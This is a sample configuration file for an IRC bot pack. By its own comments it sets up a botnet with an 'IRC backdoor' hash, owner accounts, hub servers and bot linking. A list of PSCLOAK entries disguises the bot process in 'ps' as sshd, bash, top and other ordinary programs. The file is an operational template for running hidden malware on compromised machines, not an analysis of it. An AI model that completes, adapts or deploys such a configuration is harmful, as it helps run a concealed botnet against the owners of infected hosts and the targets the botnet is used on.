pack.cfg.sample 1.7 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960
  1. /* The < && > indicates the area you must change! */
  2. /* PACKNAME: name of the pack */
  3. PACKNAME <name>
  4. /* SHELLHASH: 33 char md5 hash used for binary password */
  5. SHELLHASH <md5hash>
  6. /* BDHASH: 33 char MD5 hash used for IRC backdoor
  7. * This must remain 100% secure/private, this key can retrieve the salts, and
  8. * the entire botnet could be hijacked, a pass 8 chars or more is suggested */
  9. # NOTE: Botlink uses this for linking, if it is changed on a bot, it wont link to another bot unless
  10. # the other bot has the same bdhash. (Protects your botnet, trust me)
  11. BDHASH <md5hash>
  12. /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
  13. DCCPREFIX <.>
  14. /* The settings below can each be defined multiple times */
  15. /* OWNER <nick password host>
  16. * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
  17. * nick: nickname what else?
  18. * password: initial password for user
  19. * host: hosts of the user (list as many as needed)
  20. */
  21. OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
  22. /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
  23. * list as many as needed
  24. */
  25. OWNEREMAIL <some@email.com>
  26. /* HUB <nick host port host>
  27. * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
  28. * nick: nick of hub
  29. * host: hostname or ip of hub
  30. * port: port the hub listens on
  31. * ident: ident of the hub (list as many as needed)
  32. */
  33. HUB <God god.net 666 god ~God>
  34. /* PSCLOAK <name>
  35. * name: the name of the program to spoof as in 'ps'
  36. * list as many as needed
  37. * A default list is provided
  38. */
  39. PSCLOAK -bash
  40. PSCLOAK ftp
  41. PSCLOAK /usr/sbin/sshd
  42. PSCLOAK man
  43. PSCLOAK pine
  44. PSCLOAK bash
  45. PSCLOAK top
  46. PSCLOAK last
  47. PSCLOAK w
  48. PSCLOAK ps ux
  49. PSCLOAK bash
  50. PSCLOAK ./psybnc
  51. PSCLOAK BitchX